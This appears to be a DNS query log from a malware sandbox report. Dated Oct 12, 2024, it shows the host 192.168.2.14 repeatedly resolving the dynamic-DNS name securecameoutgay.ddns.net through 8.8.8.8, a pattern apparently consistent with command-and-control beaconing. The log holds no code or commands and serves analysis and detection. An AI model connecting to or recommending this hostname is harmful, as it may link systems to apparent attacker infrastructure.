                                                    Oct 12, 2024 23:05:06.866180897 CEST192.168.2.148.8.8.80xafd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.874653101 CEST192.168.2.148.8.8.80xafd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.891098022 CEST192.168.2.148.8.8.80xbce9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.905282021 CEST192.168.2.148.8.8.80xbce9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.920037031 CEST192.168.2.148.8.8.80xbce9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.934818983 CEST192.168.2.148.8.8.80xbce9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.945343971 CEST192.168.2.148.8.8.80xbce9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.956279039 CEST192.168.2.148.8.8.80x1e6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.966661930 CEST192.168.2.148.8.8.80x1e6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.983467102 CEST192.168.2.148.8.8.80x1e6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.003473997 CEST192.168.2.148.8.8.80x1e6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.019753933 CEST192.168.2.148.8.8.80x1e6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.029844046 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.122351885 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.151480913 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.172889948 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.184962034 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.225950956 CEST192.168.2.148.8.8.80xf5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.240556002 CEST192.168.2.148.8.8.80xf5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.255314112 CEST192.168.2.148.8.8.80xf5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.267020941 CEST192.168.2.148.8.8.80xf5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.277965069 CEST192.168.2.148.8.8.80xf5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.291892052 CEST192.168.2.148.8.8.80x7b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.327719927 CEST192.168.2.148.8.8.80x7b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.337673903 CEST192.168.2.148.8.8.80x7b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.347614050 CEST192.168.2.148.8.8.80x7b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.361982107 CEST192.168.2.148.8.8.80x7b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.378983974 CEST192.168.2.148.8.8.80xe5f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.403330088 CEST192.168.2.148.8.8.80xe5f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.413149118 CEST192.168.2.148.8.8.80xe5f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.425653934 CEST192.168.2.148.8.8.80xe5f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.437562943 CEST192.168.2.148.8.8.80xe5f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.455363989 CEST192.168.2.148.8.8.80x9a3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.465481997 CEST192.168.2.148.8.8.80x9a3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.476799965 CEST192.168.2.148.8.8.80x9a3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.487159014 CEST192.168.2.148.8.8.80x9a3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.502433062 CEST192.168.2.148.8.8.80x9a3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.517477036 CEST192.168.2.148.8.8.80xdd5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.529035091 CEST192.168.2.148.8.8.80xdd5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.539196014 CEST192.168.2.148.8.8.80xdd5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.550720930 CEST192.168.2.148.8.8.80xdd5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.561645985 CEST192.168.2.148.8.8.80xdd5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.576493025 CEST192.168.2.148.8.8.80x7fd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.585678101 CEST192.168.2.148.8.8.80x7fd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.596750021 CEST192.168.2.148.8.8.80x7fd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.604583025 CEST192.168.2.148.8.8.80x7fd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.612696886 CEST192.168.2.148.8.8.80x7fd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.622783899 CEST192.168.2.148.8.8.80xae82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.631153107 CEST192.168.2.148.8.8.80xae82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.640415907 CEST192.168.2.148.8.8.80xae82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.654160976 CEST192.168.2.148.8.8.80xae82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.662148952 CEST192.168.2.148.8.8.80xae82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.674438000 CEST192.168.2.148.8.8.80xa324Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.688119888 CEST192.168.2.148.8.8.80xa324Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.698134899 CEST192.168.2.148.8.8.80xa324Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.708264112 CEST192.168.2.148.8.8.80xa324Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.721435070 CEST192.168.2.148.8.8.80xa324Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.748740911 CEST192.168.2.148.8.8.80xf8b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.758061886 CEST192.168.2.148.8.8.80xf8b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.768271923 CEST192.168.2.148.8.8.80xf8b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.777687073 CEST192.168.2.148.8.8.80xf8b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.787241936 CEST192.168.2.148.8.8.80xf8b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.800138950 CEST192.168.2.148.8.8.80xd91dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.808609009 CEST192.168.2.148.8.8.80xd91dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.817279100 CEST192.168.2.148.8.8.80xd91dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.826623917 CEST192.168.2.148.8.8.80xd91dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.840500116 CEST192.168.2.148.8.8.80xd91dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.856919050 CEST192.168.2.148.8.8.80x7868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.867974997 CEST192.168.2.148.8.8.80x7868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.878334999 CEST192.168.2.148.8.8.80x7868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.890362978 CEST192.168.2.148.8.8.80x7868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.902457952 CEST192.168.2.148.8.8.80x7868Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.917285919 CEST192.168.2.148.8.8.80x23e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.928658962 CEST192.168.2.148.8.8.80x23e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.938678026 CEST192.168.2.148.8.8.80x23e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.949482918 CEST192.168.2.148.8.8.80x23e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.958194017 CEST192.168.2.148.8.8.80x23e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.968869925 CEST192.168.2.148.8.8.80x4f69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.979631901 CEST192.168.2.148.8.8.80x4f69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.988812923 CEST192.168.2.148.8.8.80x4f69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:07.997939110 CEST192.168.2.148.8.8.80x4f69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.006616116 CEST192.168.2.148.8.8.80x4f69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.016868114 CEST192.168.2.148.8.8.80x3f44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.026063919 CEST192.168.2.148.8.8.80x3f44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.034346104 CEST192.168.2.148.8.8.80x3f44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.042423010 CEST192.168.2.148.8.8.80x3f44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.050694942 CEST192.168.2.148.8.8.80x3f44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.060749054 CEST192.168.2.148.8.8.80x74d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.068727970 CEST192.168.2.148.8.8.80x74d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.076664925 CEST192.168.2.148.8.8.80x74d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.084208965 CEST192.168.2.148.8.8.80x74d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.091924906 CEST192.168.2.148.8.8.80x74d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.102534056 CEST192.168.2.148.8.8.80x83f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.110393047 CEST192.168.2.148.8.8.80x83f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.117834091 CEST192.168.2.148.8.8.80x83f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.125560045 CEST192.168.2.148.8.8.80x83f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.133528948 CEST192.168.2.148.8.8.80x83f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.143048048 CEST192.168.2.148.8.8.80xabdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.152692080 CEST192.168.2.148.8.8.80xabdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.161062002 CEST192.168.2.148.8.8.80xabdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.173405886 CEST192.168.2.148.8.8.80xabdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.181601048 CEST192.168.2.148.8.8.80xabdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.191314936 CEST192.168.2.148.8.8.80x3bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.199832916 CEST192.168.2.148.8.8.80x3bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.209671021 CEST192.168.2.148.8.8.80x3bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.218381882 CEST192.168.2.148.8.8.80x3bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.226952076 CEST192.168.2.148.8.8.80x3bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.239752054 CEST192.168.2.148.8.8.80x54d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.249185085 CEST192.168.2.148.8.8.80x54d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.262578011 CEST192.168.2.148.8.8.80x54d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.270607948 CEST192.168.2.148.8.8.80x54d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.279993057 CEST192.168.2.148.8.8.80x54d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.291783094 CEST192.168.2.148.8.8.80x16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.302932978 CEST192.168.2.148.8.8.80x16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.311000109 CEST192.168.2.148.8.8.80x16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.319158077 CEST192.168.2.148.8.8.80x16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.326749086 CEST192.168.2.148.8.8.80x16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.335803986 CEST192.168.2.148.8.8.80xd7e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.343380928 CEST192.168.2.148.8.8.80xd7e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.350997925 CEST192.168.2.148.8.8.80xd7e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.358829975 CEST192.168.2.148.8.8.80xd7e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.366446018 CEST192.168.2.148.8.8.80xd7e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.375875950 CEST192.168.2.148.8.8.80x249Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.383712053 CEST192.168.2.148.8.8.80x249Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.391479015 CEST192.168.2.148.8.8.80x249Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.399260044 CEST192.168.2.148.8.8.80x249Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.406882048 CEST192.168.2.148.8.8.80x249Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.416462898 CEST192.168.2.148.8.8.80x2ce8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.424365997 CEST192.168.2.148.8.8.80x2ce8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.431991100 CEST192.168.2.148.8.8.80x2ce8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.439682961 CEST192.168.2.148.8.8.80x2ce8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.447586060 CEST192.168.2.148.8.8.80x2ce8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.458359003 CEST192.168.2.148.8.8.80x236dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.466649055 CEST192.168.2.148.8.8.80x236dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.474751949 CEST192.168.2.148.8.8.80x236dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.482376099 CEST192.168.2.148.8.8.80x236dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.490175962 CEST192.168.2.148.8.8.80x236dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.499274969 CEST192.168.2.148.8.8.80xe804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.506705999 CEST192.168.2.148.8.8.80xe804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.514830112 CEST192.168.2.148.8.8.80xe804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.522712946 CEST192.168.2.148.8.8.80xe804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.530502081 CEST192.168.2.148.8.8.80xe804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.539720058 CEST192.168.2.148.8.8.80x711dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.547631025 CEST192.168.2.148.8.8.80x711dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.556210041 CEST192.168.2.148.8.8.80x711dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.563805103 CEST192.168.2.148.8.8.80x711dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.571959019 CEST192.168.2.148.8.8.80x711dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.580975056 CEST192.168.2.148.8.8.80x6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.588764906 CEST192.168.2.148.8.8.80x6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.597103119 CEST192.168.2.148.8.8.80x6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.605528116 CEST192.168.2.148.8.8.80x6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.613462925 CEST192.168.2.148.8.8.80x6b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.622457027 CEST192.168.2.148.8.8.80xc711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.630954981 CEST192.168.2.148.8.8.80xc711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.641782999 CEST192.168.2.148.8.8.80xc711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.649236917 CEST192.168.2.148.8.8.80xc711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.657196999 CEST192.168.2.148.8.8.80xc711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.666407108 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.674041033 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.683875084 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.691999912 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.699269056 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.709156036 CEST192.168.2.148.8.8.80x16feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.718329906 CEST192.168.2.148.8.8.80x16feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.725773096 CEST192.168.2.148.8.8.80x16feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.733272076 CEST192.168.2.148.8.8.80x16feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.741148949 CEST192.168.2.148.8.8.80x16feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.750375986 CEST192.168.2.148.8.8.80x5d7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.758238077 CEST192.168.2.148.8.8.80x5d7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.766666889 CEST192.168.2.148.8.8.80x5d7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.774775982 CEST192.168.2.148.8.8.80x5d7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.782948971 CEST192.168.2.148.8.8.80x5d7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.791712999 CEST192.168.2.148.8.8.80xf677Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.799977064 CEST192.168.2.148.8.8.80xf677Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.807564020 CEST192.168.2.148.8.8.80xf677Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.817738056 CEST192.168.2.148.8.8.80xf677Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.826730967 CEST192.168.2.148.8.8.80xf677Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.835273027 CEST192.168.2.148.8.8.80x99f0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.842833042 CEST192.168.2.148.8.8.80x99f0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.850171089 CEST192.168.2.148.8.8.80x99f0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.857361078 CEST192.168.2.148.8.8.80x99f0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.865236044 CEST192.168.2.148.8.8.80x99f0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.874875069 CEST192.168.2.148.8.8.80x7575Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.885263920 CEST192.168.2.148.8.8.80x7575Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.893785954 CEST192.168.2.148.8.8.80x7575Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.901196957 CEST192.168.2.148.8.8.80x7575Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.912501097 CEST192.168.2.148.8.8.80x7575Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
